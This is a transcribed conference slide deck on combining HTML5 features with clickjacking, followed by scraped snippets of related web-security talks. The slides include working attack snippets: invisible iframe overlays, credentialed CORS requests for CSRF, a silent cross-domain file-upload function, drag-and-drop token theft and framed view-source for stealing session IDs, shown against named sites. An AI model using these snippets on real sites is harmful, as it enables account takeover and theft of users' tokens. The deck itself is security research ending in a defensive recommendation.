HTML5: Something wicked this way comes. Krzysztof Kotowicz Securing
|
|
|
- Anabel Lindsey
- 6 years ago
- Views:
Transcription
1 HTML5: Something wicked this way comes Krzysztof Kotowicz Securing 1
2 About me security researcher HTML 5 UI redressing / clickjacking xss-track, squid-imposter,... pentester IT security trainer Hacking HTML5 2
3 Plan Same origin policy Exploiting users Attack gadgets Wrap-up 3
4 Same origin policy the single most important security concept for the web restricts communication between websites from different domains has many flavors without it hell breaks loose 4
5 Same origin policy can be relaxed though crossdomain.xml document.domain HTML5 Cross Origin Resource Sharing or ignored... by exploiting users UI redressing (clickjacking) 5
6 Exploiting users Users Like games 100 mln play social games //goo.gl/rrwlm Are not security-savvy 6
7 Exploiting users //goo.gl/dgppy 7
8 Combined attacks Gadgets HTML5 UI redressing Join them New attacks 8
9 Gadgets 9
10 Basic clickjacking 10
11 Basic clickjacking 20x20 <iframe> 11
12 Basic clickjacking <iframe> x20 12
13 Basic clickjacking Victim website <iframe> 20x20 Like us, plz! 13
14 Basic clickjacking <iframe src=inner.html width=20 height=20 scrolling=no style="opacity:0;"></iframe> <!-- inner.html --> <iframe src="//victim" width=5000 height=5000 style="position: absolute; top:-300px; left: -350px;"></iframe> 14
15 Basic clickjacking Trick: Click here to see a video! User action: click + Any clickable action + Works in every browser - X-Frame-Option - JS framebusting 15
16 HTML5 IFRAME sandbox Used to embed untrusted content prevents XSS prevents defacement Facilitates clickjacking! <iframe sandbox="allow-same-origin allow-forms allow-scripts" src="//victim"></iframe> //html5sec.org/#122 16
17 HTML5 IFRAME sandbox + Chrome / Safari / IE 10 + Will disable most JS framebusters - X-Frame-Option 17
18 Cross Origin Resource Sharing HTML5-ish Cross domain AJAX With cookies Blind Unless the receiving site agrees Not limited to <form> syntax Used to trigger CSRF 18
19 Cross Origin Resource Sharing var xhr = new XMLHttpRequest(); xhr.open("post", " true); xhr.setrequestheader("content-type", "text/plain"); xhr.withcredentials = "true"; // send cookies xhr.send("anything I want"); 19
20 Cross Origin Resource Sharing POST / HTTP/1.1 Host: victim Connection: keep-alive Referer: Content-Length: 15 Origin: Content-Type: text/plain... Cookie: my-cookie=myvalue Anything I want 20
21 Silent file upload File upload purely in Javascript Silent <input type=file> with any file name and content Uses CORS How? Create raw multipart/form-data 21
22 Silent file upload function fileupload(url, filedata, filename) { var filesize = filedata.length, boundary = "xxxxxxxxx", xhr = new XMLHttpRequest(); xhr.open("post", url, true); xhr.withcredentials = "true"; xhr.setrequestheader("content-type", "multipart/form-data, boundary="+boundary); xhr.setrequestheader("content-length", filesize); 22
23 Silent file upload var body = "\ --" + boundary + '\r\n\ Content-Disposition: form-data;\ name="contents"; filename="' + filename + '"\r\n\ Content-Type: application/octet-stream\r\n\ \r\n\ ' + filedata + '\r\n\ --' + boundary + '--'; xhr.send(body); 23
24 Silent file upload + No user action + No frames + Cross-domain, with cookies + Works in most browsers + You can add more form fields - CSRF flaw needed - No access to response 24
25 Silent file upload DEMO Flickr.com 25
26 Flickr.com attack toolbox Remember me Flickr creates logged session on first request CSRF file upload accepts file uploads token check skipped 26
27 Drag into Put attackers content into victim form 27
28 Drag into Trick: Put paper in the can! User action: drag & drop, click + Inject arbitrary content + Trigger self-xss - Firefox only - X-Frame-Option - JS framebusting 28
29 Drag out content extraction DEMO Alphabet Hero 29
30 Drag into Self-XSS in real life: wordpress 0-day (Jelmer de Hen) //goo.gl/dnyi5 chronme.com (sneaked.net) //goo.gl/hs7bw Google Code vulns (Amol Naik) //goo.gl/nxkfy 30
31 Drag out content extraction image image 31
32 Drag out content extraction image victim <iframe> image 32
33 Drag out content extraction image victim <iframe> textarea <textarea> 33
34 Drag out content extraction <div id=game style="position:relative"> <img style="position:absolute;..." src="paper.png" /> <img style="position:absolute;..." src="trash.png" /> <iframe scrolling=no id=iframe style="position:absolute;opacity:0;..."> </iframe> <textarea style="position:absolute; opacity:0;..." id=dropper></textarea> </div> 34
35 Drag out content extraction 35
36 Drag out content extraction 36
37 Drag out content extraction $("#iframe").attr('src', 'outer.html ); $('#dropper').bind('drop', function() { settimeout(function() { var urlmatch = $("#dropper").val().match(/token=([a-h0-9]+)$/); if (urlmatch) { var token = urlmatch[1]; // do EVIL } }, 100); }); 37
38 Drag out content extraction Trick: Put paper in the can! User action: drag & drop + Access sensitive content cross domain - Firefox only - X-Frame-Option - JS framebusting 38
39 Drag out content extraction DEMO Min.us 39
40 Min.us attack toolbox CORS to create gallery social engineering extract gallery editor-id from <a href> silent file upload to gallery CORS change gallery to public HTML5 + UI redressing combined! 40
41 View-source Display HTML source in frame session IDs tokens private data <iframe src="view-source:view-source: width=5000 height=5000 style="position: absolute; top: -300px; left: -150px;"> </iframe> 41
42 View-source 42
43 View-source 43
44 View-source Trick: Your serial number is... User action: select + drag & drop, copy-paste + Beats JS framebusting + Already earned $500 from Facebook - X-Frame-Options - Firefox only - Complicated user action 44
45 View-source DEMO Imgur.com 45
46 Imgur.com attack toolbox framed view-source: captcha-like string (AdSense ID) session ID social engineering: trick to copy/paste page source Exploitation: cookie auth, no IP limits for session 46
47 Summary UI redressing attacks are improving HTML5 helps exploiting vulnerabilities Users can be a weak link too! Devs: Use X-Frame-Options: DENY 47
48 Links html5sec.org code.google.com/p/html5security clickjacking blog.kotowicz.net github.com/koto 48
49 ? 49
Security implications of the Cross-Origin Resource Sharing. Gergely Revay
Security implications of the Cross-Origin Resource Sharing Gergely Revay http://gerionsecurity.com @geri_revay Disclaimer This presentation is purely my opinion and not related to SIEMENS. https://c1.staticflickr.com/1/21/27423135_082e7b5983.jpg
Neat tricks to bypass CSRF-protection. Mikhail
Neat tricks to bypass CSRF-protection Mikhail Egorov @0ang3el About me AppSec Engineer @ Ingram Micro Cloud Bug hunter & Security researcher Conference speaker https://www.slideshare.net/0ang3el @0ang3el
UI Redressing: Attacks and Countermeasures Revisited
UI Redressing: Attacks and Countermeasures Revisited Marcus Niemietz @CONFidence 2011 25th of May 2011 Short and crisp details about me Studying IT-Security/Information Technology at the Ruhr-University
OWASP AppSec Research The OWASP Foundation New Insights into Clickjacking
New Insights into Clickjacking Marco `embyte` Balduzzi iseclab @ EURECOM embyte@iseclab.org AppSec Research 2010 Joint work with Egele, Kirda, Balzarotti and Kruegel Copyright The Foundation Permission
CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
More attacks on clients: Click-jacking/UI redressing, CSRF
Web Security More attacks on clients: Click-jacking/UI redressing, CSRF (Section 7.2.3 on Click-jacking; Section 7.2.7 on CSRF; Section 7.2.8 on Defenses against client-side attacks) 1 Recall from last
W3Conf, November 15 & 16, Brad Scott
The Future of Web Application Security W3Conf, November 15 & 16, 2011 Brad Hill @hillbrad bhill@paypal-inc.com Scott Stender @scottstender scott@isecpartners.com The History of Web App Security Attacker
RKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
CS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session
WEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
Web basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
Cross Site Request Forgery
Cross Site Request Forgery VULNERABILITY OVERVIEW WHITE PAPER PUBLIC Version: 1.0 By: Acadion Security URL: http://www.acadion.nl/ Date: February 6, 2013 Address: Koornmarkt 46 2611 EH Delft Nederland
Cross-Site Request Forgery in Cisco SG220 series
Cross-Site Request Forgery in Cisco SG220 series Security advisory 12/09/2016 Renaud Dubourguais Nicolas Collignon www.synacktiv.com 5 rue Sextius Michel 75015 Paris Vulnerability description The Cisco
NoScript, CSP and ABE: When The Browser Is Not Your Enemy
NoScript, CSP and ABE: When The Browser Is Not Your Enemy Giorgio Maone CTO, NoScript lead developer InformAction OWASP-Italy Day IV Milan 6th, November 2009 Copyright 2008 - The OWASP Foundation Permission
Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)
Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side) Narendra Bhati @NarendraBhatiB http://websecgeeks.com Abusing Windows Opener To Bypass CSRF Protection Narendra Bhati Page
Wednesday, 10 October 2012 PRELIMINARY SLIDES
PRELIMINARY SLIDES THIS WAY NO, it is not about horror stories concerning JavaScript WE ALL LOVE FEAR- MONGERING. Wednesday, 10 October 2012 starting with the credits... A Short History of the javascript
Client Side Injection on Web Applications
Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to
Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies / Ben Stock Martin Johns
Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies (@slekies) / Ben Stock (@kcotsneb) Martin Johns (@datenkeller) Agenda The Same-Origin Policy Cross-Site Script Inclusion (XSSI) Generalizing
WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422
Lecture 17 Browser Security Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422 Documents Browser's fundamental role is to display documents comprised
Web Security. Course: EPL 682 Name: Savvas Savva
Web Security Course: EPL 682 Name: Savvas Savva [1] A. Barth and C. Jackson and J. Mitchell, Robust Defenses for Cross-Site Request Forgery, pub. in 15th ACM Conference, 2008. [2] L. Huang and A. Moshchuk
Web basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
Some Facts Web 2.0/Ajax Security
/publications/notes_and_slides Some Facts Web 2.0/Ajax Security Allen I. Holub Holub Associates allen@holub.com Hackers attack bugs. The more complex the system, the more bugs it will have. The entire
How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
Attacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
Security. CSC309 TA: Sukwon Oh
Security CSC309 TA: Sukwon Oh Outline SQL Injection NoSQL Injection (MongoDB) Same Origin Policy XSSI XSS CSRF (XSRF) SQL Injection What is SQLI? Malicious user input is injected into SQL statements and
JOE WIPING OUT CSRF
JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? 6 SAFE VS. UNSAFE Safe GET HEAD
Web Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Faculty of Computer Science Institute of Systems Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
JOE WIPING OUT CSRF
JOE ROZNER @JROZNER WIPING OUT CSRF IT S 2017 WHAT IS CSRF? 4 WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS WHERE DOES CSRF COME FROM? LET S TALK HTTP SAFE VS. UNSAFE
Browser code isolation
CS 155 Spring 2016 Browser code isolation John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University. When slides are
Exploiting and Defending: Common Web Application Vulnerabilities
Exploiting and Defending: Common Web Application Vulnerabilities Introduction: Steve Kosten Principal Security Consultant SANS Instructor Denver OWASP Chapter Lead Certifications CISSP, GWAPT, GSSP-Java,
Cross-Site Request Forgery (CSRF) Attack Lab
Laboratory for Computer Security Education 1 Cross-Site Request Forgery (CSRF) Attack Lab (Web Application: Collabtive) Copyright c 2006-2011 Wenliang Du, Syracuse University. The development of this document
Application vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability
Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 5 Secure Network - Security Research
Penetration Test Report
Penetration Test Report Feb 12, 2018 Ethnio, Inc. 6121 W SUNSET BLVD LOS angeles, CA 90028 Tel (888) 879-7439 ETHN.io Summary This document contains the most recent pen test results from our third party
last time: command injection
Web Security 1 last time: command injection 2 placing user input in more complicated language SQL shell commands input accidentally treated as commands in language instead of single value (e.g. argument/string
Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets
Code-Reuse Attacks for the Web: Breaking XSS mitigations via Script Gadgets Sebastian Lekies (@slekies) Krzysztof Kotowicz (@kkotowicz) Eduardo Vela Nava (@sirdarckcat) Agenda 1. 2. 3. 4. 5. 6. Introduction
Web security: an introduction to attack techniques and defense methods
Web security: an introduction to attack techniques and defense methods Mauro Gentile Web Application Security (Elective in Computer Networks) F. d'amore Dept. of Computer, Control, and Management Engineering
Web Security. Thierry Sans
Web Security Thierry Sans 1991 Sir Tim Berners-Lee Web Portals 2014 Customer Resources Managemen Accounting and Billing E-Health E-Learning Collaboration Content Management Social Networks Publishing Web
Writing Secure CFML Pete Freitag, Foundeo Inc. foundeo
Writing Secure CFML Pete Freitag, Foundeo Inc. foundeo Who am I? Over 10 years working with ColdFusion Owner of Foundeo Inc a ColdFusion consulting & Products company Author, Blogger, and Twitterer? Today
October 08: Introduction to Web Security
October 08: Introduction to Web Security Scribe: Rohan Padhye October 8, 2015 Web security is an important topic because web applications are particularly hard to secure, and are one of the most vulnerable/buggy
XSSFor the win! What can be really done with Cross-Site Scripting.
XSSFor the win! What can be really done with Cross-Site Scripting by @brutelogic Whoami Security Researcher at Sucuri Security (a GoDaddy company) XSS, filter/waf bypass and bash! Helped to fix more than
Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
Saumil Shah. net-square DEEPS E C
when Bad Things come Good in packages Saumil Shah DEEPS E C 2 0 1 2 # who am i Saumil Shah, CEO Net-Square. Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. M.S. Computer Science Purdue University.
LECT 8 WEB SECURITY BROWSER SECURITY. Repetition Lect 7. WEB Security
Repetition Lect 7 LECT 8 WEB SECURITY Access control Runtime protection Trusted computing Java as basic model for signed code Trusted Computing Group TPM ARM TrustZone Mobile Network security GSM security
Information Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
Match the attack to its description:
Match the attack to its description: 8 7 5 6 4 2 3 1 Attacks: Using Components with Known Vulnerabilities Missing Function Level Access Control Sensitive Data Exposure Security Misconfiguration Insecure
Unusual Web Bugs. A Web App Hacker s Bag O Tricks. Alex kuza55 K.
Unusual Web Bugs A Web App Hacker s Bag O Tricks Alex kuza55 K. kuza55@gmail.com http://kuza55.blogspot.com/ I'm Alex Starting Uni next year Working for SIFT http://www.sift.com.au/ This talk is Not an
Common Websites Security Issues. Ziv Perry
Common Websites Security Issues Ziv Perry About me Mitnick attack TCP splicing Sql injection Transitive trust XSS Denial of Service DNS Spoofing CSRF Source routing SYN flooding ICMP
PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH
Department of Computer Science Institute of System Architecture, Operating Systems Group PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH THE WEB AS A DISTRIBUTED SYSTEM 2 WEB HACKING SESSION 3 3-TIER persistent
Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft
Cross-domain leakiness Divulging sensitive information & attacking SSL sessions Chris Evans - Google Billy Rios - Microsoft Who are we? Chris Evans Troublemaker, Engineer, Tech Lead, Google Security Team
CSRF in the Modern Age
CSRF in the Modern Age Sidestepping the CORS Standard Tanner Prynn @tannerprynn In This Talk The State of CSRF The CORS Standard How Not To Prevent CSRF The Fundamentals of HTTP Without cookies: With cookies:
Running Remote Code is Risky. Why Study Browser Security. Browser Sandbox. Threat Models. Security User Interface.
CSE 127 Winter 2008 Security Collin Jackson Running Remote Code is Risky Compromise Host Write to file system Interfere with other processes Steal information Read file system Read information associated
Information Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
Content Security Policy
About Tim Content Security Policy New Tools for Fighting XSS Pentester > 10 years Web Applications Network Security Products Exploit Research Founded Blindspot Security in 2014 Pentesting Developer Training
RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11
RBS-2018-004 NetGain Enterprise Manager Multiple Vulnerabilities 2018-03-22 1 of 11 Table of Contents Vendor / Product Information 3 Vulnerable Program Details 3 Credits 3 Impact 3 Vulnerability Details
Top 10 Web Application Vulnerabilities
Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other
Web Attacks CMSC 414. September 25 & 27, 2017
Web Attacks CMSC 414 September 25 & 27, 2017 Overview SQL Injection is frequently implemented as a web-based attack, but doesn t necessarily need to be There are a wide variety of web-based attacks Some
The security of Mozilla Firefox s Extensions. Kristjan Krips
The security of Mozilla Firefox s Extensions Kristjan Krips Topics Introduction The extension model How could extensions be used for attacks - website defacement - phishing attacks - cross site scripting
Exploiting unknown browsers and objects. with the Hackability inspector
Exploiting unknown browsers and objects with the Hackability inspector!1 About me U+6158 I'm a researcher at PortSwigger I hacking JavaScript 1337inalert(1) @garethheyes!2 Hackability Created to test capabilities
Sichere Webanwendungen mit Java
Sichere Webanwendungen mit Java Karlsruher IT- Sicherheitsinitiative 16.07.2015 Dominik Schadow bridgingit Patch fast Unsafe platform unsafe web application Now lets have a look at the developers OWASP
Web Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side
DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
Part of this connection identifies how the response can / should be provided to the client code via the use of a callback routine.
What is AJAX? In one sense, AJAX is simply an acronym for Asynchronous JavaScript And XML In another, it is a protocol for sending requests from a client (web page) to a server, and how the information
Practical Clickjacking with BeEF
Practical Clickjacking with BeEF Brigette Lundeen Center for Secure and Dependable Systems University of Idaho brigette.lundeen@gmail.com Dr. Jim Alves-Foss Center for Secure and Dependable Systems University
Attacking Web2.0. Daiki Fukumori Secure Sky Technology Inc.
Attacking Web2.0 Daiki Fukumori Secure Sky Technology Inc. Agenda Introduction What Is Web2.0 (from Attackers view) Attacking Same-Origin Policy Advanced Attacking Same-Origin
Robust Defenses for Cross-Site Request Forgery Review
Robust Defenses for Cross-Site Request Forgery Review Network Security Instructor:Dr. Shishir Nagaraja Submitted By: Jyoti Leeka October 16, 2011 1 Introduction to the topic and the reason for the topic
WHY CSRF WORKS. Implicit authentication by Web browsers
WHY CSRF WORKS To explain the root causes of, and solutions to CSRF attacks, I need to share with you the two broad types of authentication mechanisms used by Web applications: 1. Implicit authentication
FIRE-FOX XSS PREVENTION
Zhen Huang Nikolay Pavlovich Laptev Jason Liu FIRE-FOX XSS PREVENTION I. INTRODUCTION In recent years XSS attacks have become more widespread due to the growing popularity of AJAX and other dynamic web
logistics CHALLENGE assignment take-home portion of the final next class final exam review
Sandboxing 1 logistics 2 CHALLENGE assignment take-home portion of the final next class final exam review CHALLENGE (1) 3 expect to release before Saturday; due by written final probably complete all but
CS 155 Project 2. Overview & Part A
CS 155 Project 2 Overview & Part A Project 2 Web application security Composed of two parts Part A: Attack Part B: Defense Due date: Part A: May 5th (Thu) Part B: May 12th (Thu) Project 2 Ruby-on-Rails
Application Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
Advanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
Writing Secure Chrome Apps and Extensions
Writing Secure Chrome Apps and Extensions Keeping your users safe Jorge Lucángeli Obes Software Engineer Keeping users safe A lot of work going into making browsers more secure What about users' data?
CS 161 Computer Security
Raluca Ada Popa Spring 2018 CS 161 Computer Security Discussion 9 Week of March 19, 2018 Question 1 Warmup: SOP (15 min) The Same Origin Policy (SOP) helps browsers maintain a sandboxed model by preventing
Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007
Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1
Ajax- XMLHttpResponse. Returns a value such as ArrayBuffer, Blob, Document, JavaScript object, or a DOMString, based on the value of
Ajax- XMLHttpResponse XMLHttpResponse - A Read only field Returns a value such as ArrayBuffer, Blob, Document, JavaScript object, or a DOMString, based on the value of XMLHttpRequest.responseType. This
EasyCrypt passes an independent security audit
July 24, 2017 EasyCrypt passes an independent security audit EasyCrypt, a Swiss-based email encryption and privacy service, announced that it has passed an independent security audit. The audit was sponsored
Web Security: Authentication & UI-based attacks
Web Security: Authentication & UI-based attacks CS 161: Computer Security Prof. Raluca Ada Popa April 12, 2016 Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof.
Advanced CSRF and Stateless at OWASP AppSec Research 2012
Advanced CSRF and Stateless Anti-CSRF @johnwilander at OWASP AppSec Research 2012 Frontend developer at Svenska Handelsbanken Researcher in application security Co-leader OWASP Sweden @johnwilander johnwilander.com
Chrome Extension Security Architecture
Chrome Extension Security Architecture Presenter: Jienan Liu Network, Intelligence & security Lab outline Chrome extension introduction Threats towards extension Chrome extension s security architecture
Web Security: 1) UI-based attacks 2) Tracking on the web
Web Security: 1) UI-based attacks 2) Tracking on the web CS 161: Computer Security Prof. Raluca Ada Popa November 15, 2016 Contains new slides, slides from past CS 161 offerings and slides from Dan Boneh
Web Security II. Slides from M. Hicks, University of Maryland
Web Security II Slides from M. Hicks, University of Maryland Recall: Putting State to HTTP Web application maintains ephemeral state Server processing often produces intermediate results; not long-lived
Web Security: Vulnerabilities & Attacks
Computer Security Course. Web Security: Vulnerabilities & Attacks Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack
Vulnerability Analysis, Secure Development and Risk Management of Web 2.0 Applications OWASP. The OWASP Foundation
Vulnerability Analysis, Secure Development and Risk Management of Web 2.0 Applications Marco Morana Cincinnati Chapter, November 2010 Meeting Copyright 2010 - The Foundation Permission is granted to copy,
Web Security IV: Cross-Site Attacks
1 Web Security IV: Cross-Site Attacks Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab3 New terminator: http://www.cs.ucr.edu/~csong/sec/17/l/new_terminator Bonus for solving the old one
CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2
CNIT 129S: Securing Web Applications Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2 Finding and Exploiting XSS Vunerabilities Basic Approach Inject this string into every parameter on every
CSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
Build Native-like Experiences in HTML5
Developers Build Native-like Experiences in HTML5 The Chrome Apps Platform Joe Marini - Chrome Developer Advocate About Me Joe Marini Developer Relations Lead - Google Chrome google.com/+joemarini @joemarini
UNIT 3 SECTION 1 Answer the following questions Q.1: What is an editor? editor editor Q.2: What do you understand by a web browser?
UNIT 3 SECTION 1 Answer the following questions Q.1: What is an editor? A 1: A text editor is a program that helps you write plain text (without any formatting) and save it to a file. A good example is
RIA Security - Broken By Design. Joonas Lehtinen IT Mill - CEO
RIA Security - Broken By Design Joonas Lehtinen IT Mill - CEO a system is secure if it is designed to be secure and there are no bugs no system should be designed to be insecure not all bugs are security
Lecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
Static Webpage Development
Dear Student, Based upon your enquiry we are pleased to send you the course curriculum for PHP Given below is the brief description for the course you are looking for: - Static Webpage Development Introduction
The PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference
The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Copyright 2007 - The OWASP Foundation Permission is granted to copy,
Attacking the Application OWASP. The OWASP Foundation. Dave Ferguson, CISSP Security Consultant FishNet Security.
Attacking the Application Dave Ferguson, CISSP Security Consultant FishNet Security Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the
Web Security Computer Security Peter Reiher December 9, 2014
Web Security Computer Security Peter Reiher December 9, 2014 Page 1 Web Security Lots of Internet traffic is related to the web Much of it is financial in nature Also lots of private information flow around
Computer Security CS 426 Lecture 41
Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general